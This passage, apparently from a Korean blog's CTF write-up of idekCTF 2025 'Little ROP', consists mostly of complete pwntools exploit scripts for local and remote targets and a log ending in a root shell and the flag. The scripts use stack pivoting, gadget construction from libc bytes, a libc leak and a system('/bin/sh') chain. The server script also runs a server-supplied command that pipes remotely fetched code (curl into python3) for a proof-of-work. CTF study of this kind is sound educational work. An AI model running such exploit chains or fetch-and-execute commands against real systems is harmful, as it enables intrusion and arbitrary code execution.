ubuntu@06287c6a0589:~\/study\/idekctf2025\/LittleROP$ python3 solve_local.py\n[+] Starting local process '.\/chall': pid 5923\n[*] leak: b'\\\\xa0V\\\\xfa\\\\xf7\\\\xff\\\\x7f\\\\x00\\\\x00'\n[*] leak: 0x7ffff7fa56a0\n[*] libc base: 0x7ffff7d8a000\n<\/pre>\n\n\n\n
libc base \uc8fc\uc18c\ub97c \uad6c\ud588\uc73c\ub2c8 system(\u201d\/bin\/sh\u201d) \ud574\uc8fc\ub294 ROP chain\uc744 \uad6c\uc131\ud574\uc8fc\uba74 \ub05d.<\/p>\n\n\n\n
# set final rop payload !!!\n\nretn = l.address + 0xC738A\npop_rdi_retn = l.address + 0xC7389\nbin_sh = l.address + 0x1D8678\nsystem = l.sym.system\n\npay = p64(pop_rdi_retn) + p64(bin_sh) + p64(system)*2\npay += p64(0x4049b8+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\ns(b\"win\")\n\npi()\n<\/pre>\n\n\n\n
solve.py<\/a> (Local)<\/h3>\n\n\n\n
#!\/usr\/bin\/env python3\n\nfrom pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport sys\n\np = process(\".\/chall\")\n# p = remote(\"host3.dreamhack.games\", 20548)\ne = ELF('.\/chall',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n# l = ELF('.\/libc_prob.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\nvuln_lea_read = 0x4011a9\nadd_rbp_0x3d_ebx = 0x40113c\n\n# 1. Prepare write to where\npay = b'A'*0x20\npay += p64(0x404c00)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# 2. \npay = b'A'*0x20\npay += p64(0x404b00)\npay += p64(0x4011ca) #setup\ns(pay)\nsleep(0.001)\n\n# 3. libc fengshui\ndef fengshui_libc():\n    for i in range(5):\n        pay = b'B'*0x20\n        pay += p64(0x404c00+0x70*i)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        pay = b'C'*0x20\n        pay += p64(0x404900)\n        pay += p64(0x4011ca) #setup\n        s(pay)\n        sleep(0.001)\n\nfengshui_libc()\n\ndef fengshui_ret_rbp(base):\n    for i in range(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        #rbp reset and write\n        pay = (p64(vuln_lea_read) + p64(0x404a00)) * 2 #what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\ndef fengshui_rbp_ret(base):\n    for i in range(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        #rbp reset and write\n        pay = (p64(0x404a00) + p64(vuln_lea_read)) * 2 #write to what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n# 0. (overwrite rbp), this will used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404d08 + 0x3d) #set rbp\ns(pay)\nsleep(0.001)\n\n# 1. set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.001)\n\n#2. set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:00000000000C7389 5F                                      pop     rdi\n# .text:00000000000C738A C3                                      retn\npay = p64(0x3cddc) #rbx value (will be added); 0x8a5ad + 0x3cddc = 0xc7389\ns(pay)\nsleep(0.001)\n\n#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# set rbx\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.001)\n\n# set rop again\n# 0. (overwrite rbp), this will used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404d18 + 0x3d) #set rbp\ns(pay)\nsleep(0.001)\n\n# 1. set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.001)\n\n#2. set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:0000000000114870                         write \npay = p64(0x932f1) #rbx value (will be added); 0x8157f + 0x932f1 = 0x114870\ns(pay)\nsleep(0.001)\n\n#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# set rbx\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.001)\n\n# will be used rbp when run \"pop rdi\" gadget\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d00+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404a00) \ns(pay)\nsleep(0.001)\n\n# will be used when run \"pop rdi\" gadget\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d10+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(1) #set rdi\ns(pay)\nsleep(0.001)\n\n# set ret\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'd'*0x20\npay += p64(0x404d20+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d00) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.001)\n\n# obtain libc base\nleak = r(0x10)\nleak = leak[8:8+8]\ninfo(f\"leak: {leak}\")\nleak = uu64(leak)\ninfo(f\"leak: {hex(leak)}\")\nl.address = leak - l.sym._IO_2_1_stderr_\ninfo(f\"libc base: {hex(l.address)}\")\n\nr(0x20)\n\n# set final rop payload !!!\n\nretn = l.address + 0xC738A\npop_rdi_retn = l.address + 0xC7389\nbin_sh = l.address + 0x1D8678\nsystem = l.sym.system\n\npay = p64(pop_rdi_retn) + p64(bin_sh) + p64(system)*2\npay += p64(0x4049b8+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\ns(b\"win\")\n\npi()\n<\/pre>\n\n\n\n
solve.py<\/a> (server)<\/h3>\n\n\n\n
#!\/usr\/bin\/env python3\n\nfrom pwn import *\nfrom tqdm import *\n\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport sys\nimport subprocess\n\n# p = process(\".\/chall\")\np = remote(\"little-rop.chal.idek.team\", 1337)\ne = ELF('.\/chall',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n# l = ELF('.\/libc_prob.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\nvuln_lea_read = 0x4011a9\nadd_rbp_0x3d_ebx = 0x40113c\n\n## Robot check\nleak =  ru(b\"Solution? \")\ncmd = leak.split(b\"    \")[1]\ncmd = cmd.split(b\"\\\\n\")[0]\ninfo(f\"cmd = {cmd}\")\n\nproc = subprocess.run(\n    [\"bash\", \"-c\", cmd],\n    stdout=subprocess.PIPE,\n    stderr=subprocess.PIPE,\n    text=True,        # \uacb0\uacfc\ub97c str \ub85c \ubc1b\uae30 \uc704\ud568\n    check=True        # \uc5d0\ub7ec \uc2dc \uc608\uc678 \ubc1c\uc0dd\n)\n\nanswer = proc.stdout.strip()\n\ninfo(f\"answer: {answer}\")\n\nsl(answer)\n\n# pi()\n\n# 1. Prepare write to where\npay = b'A'*0x20\npay += p64(0x404c00)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# 2. \npay = b'A'*0x20\npay += p64(0x404b00)\npay += p64(0x4011ca) #setup\ns(pay)\nsleep(0.4)\n\n# 3. libc fengshui\ndef fengshui_libc():\n    for i in trange(5):\n        pay = b'B'*0x20\n        pay += p64(0x404c00+0x70*i)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.4)\n\n        pay = b'C'*0x20\n        pay += p64(0x404900)\n        pay += p64(0x4011ca) #setup\n        s(pay)\n        sleep(0.4)\n\nfengshui_libc()\n\ndef fengshui_ret_rbp(base):\n    for i in trange(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.4)\n\n        #rbp reset and write\n        pay = (p64(vuln_lea_read) + p64(0x404a00)) * 2 #what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.4)\n\ndef fengshui_rbp_ret(base):\n    for i in trange(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.4)\n\n        #rbp reset and write\n        pay = (p64(0x404a00) + p64(vuln_lea_read)) * 2 #write to what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.4)\n\n# 0. (overwrite rbp), this will used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = p64(0x404d08 + 0x3d) #set rbp\ns(pay)\nsleep(0.4)\n\n# 1. set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.4)\n\n#2. set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# .text:00000000000C7389 5F                                      pop     rdi\n# .text:00000000000C738A C3                                      retn\npay = p64(0x3cddc) #rbx value (will be added); 0x8a5ad + 0x3cddc = 0xc7389\ns(pay)\nsleep(0.4)\n\n#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# set rbx\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.4)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.4)\n\n# set rop again\n# 0. (overwrite rbp), this will used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = p64(0x404d18 + 0x3d) #set rbp\ns(pay)\nsleep(0.4)\n\n# 1. set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.4)\n\n#2. set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# .text:0000000000114870                         write \npay = p64(0x932f1) #rbx value (will be added); 0x8157f + 0x932f1 = 0x114870\ns(pay)\nsleep(0.4)\n\n#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# set rbx\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.4)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.4)\n\n# will be used rbp when run \"pop rdi\" gadget\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d00+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = p64(0x404a00) \ns(pay)\nsleep(0.4)\n\n# will be used when run \"pop rdi\" gadget\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d10+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = p64(1) #set rdi\ns(pay)\nsleep(0.4)\n\n# set ret\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'd'*0x20\npay += p64(0x404d20+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d00) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.4)\n\n# obtain libc base\nleak = r(0x40)\ninfo(f\"leak: {leak}\")\n# pi()\nleak = leak[0x10:0x10+8]\ninfo(f\"leak: {leak}\")\nleak = uu64(leak)\ninfo(f\"leak: {hex(leak)}\")\nl.address = leak - l.sym._IO_2_1_stderr_\ninfo(f\"libc base: {hex(l.address)}\")\n\n# set final rop payload !!!\n\nretn = l.address + 0xC738A\npop_rdi_retn = l.address + 0xC7389\nbin_sh = l.address + 0x1D8678\nsystem = l.sym.system\n\npay = p64(pop_rdi_retn) + p64(bin_sh) + p64(system)*2\npay += p64(0x4049b8+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\ns(b\"win\")\n\npi()\n<\/pre>\n\n\n\n
Result<\/h3>\n\n\n\n
ubuntu@4b44540d70d5:~\/study\/idekCTF\/attachments$ python3 solve5_server.py\n[+] Opening connection to little-rop.chal.idek.team on port 1337: Done\n[*] cmd = b'python3 <(curl -sSL <https:\/\/goo.gle\/kctf-pow>) solve s.AA+r.AABye4oxHgxTHZSoOwrZKMUf'\n[*] answer: s.AABgMxwKVIDz4moR8Uk\/af0BoBLAeQkOZjkQNHdae4DzAiFPnLWeYJAPaF0gck\/BN4elxuR5RFPgQ8KgfJXoo5hzDGRz4q5ggxKyh5ek96C133SsIyETSwiBDtUVYEXi8B\/Tz8z\/JZrhIGIvFElTwvWYpSu0Op9esxXt8SVvPdnKtA5Jt\/03Tfh6yfhJmaDUPVN5ek02R3jwxD2s04D8e2jR\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5\/5 [00:04<00:00,  1.19it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.20it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.19it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.20it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.20it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.14it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.19it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.20it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.20it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.20it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.19it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01<00:00,  1.20it\/s]\n[*] leak: b'Correct\\\\naM@\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa0\\\\xb6\\\\x821xz\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00J@\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x89sm1xz\\\\x00\\\\x00'\n[*] leak: b'\\\\xa0\\\\xb6\\\\x821xz\\\\x00\\\\x00'\n[*] leak: 0x7a783182b6a0\n[*] libc base: 0x7a7831610000\n[*] Switching to interactive mode\n$ cat \/flag.txt\nidek{R0p_r0P_R0P_5HOW_u$_7HE_R0P}$ \n[*] Interrupted\n[*] Closed connection to little-rop.chal.idek.team port 1337\nubuntu@4b44540d70d5:~\/study\/idekCTF\/attachments$ \n<\/pre>\n","protected":false},"excerpt":{"rendered":"
checksec Decompiled-src \/ Analysis main \/ setup \/ vuln stdin, stdout, stderr\uc758 \ubc84\ud37c\ub9c1\uc744 \ubaa8\ub450 \ube44\ud65c\uc131\ud654\ud558\uace0, 32\ubc14\uc774\ud2b8\uc758 buf\ub97c read\ub97c \ud1b5\ud574 48\ubc14\uc774\ud2b8\ub9cc\ud07c \uc785\ub825\ubc1b\ub294\ub2e4. \ub530\ub77c\uc11c, \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0\ub97c \ubc1c\uc0dd\uc2dc\ud0ac \uc218 \uc788\ub294\ub370 16\ubc14\uc774\ud2b8\ub97c \ucd08\uacfc\uc2dc\ud0ac \uc218 \uc788\uc5b4 main\u2019s RBP, RET\uae4c\uc9c0\ub9cc \ub36e\uc744 \uc218 \uc788\ub2e4. Solution 1. main\u2019s RBP\ub97c 0x404c00 \uc8fc\uc18c\ub85c \ub36e\uace0 main\u2019s RET\uc744 0x4011a9\ub85c \ub36e\uae30 \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0 \ucde8\uc57d\uc810\uc73c\ub85c rbp, ret\uc744 \ubaa8\ub450 \uc6d0\ud558\ub294… \ub354 \ubcf4\uae30 »[idekCTF2025] pwn\/Little ROP (\ube0c\ud3ec X, pop rdi \uac19\uc740 \uac00\uc82f\uc774 \uc5c6\uc74c)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25,31],"class_list":["post-3921","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable","tag-rop"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3921","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3921"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3921\/revisions"}],"predecessor-version":[{"id":3922,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3921\/revisions\/3922"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3921"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3921"},{"taxonom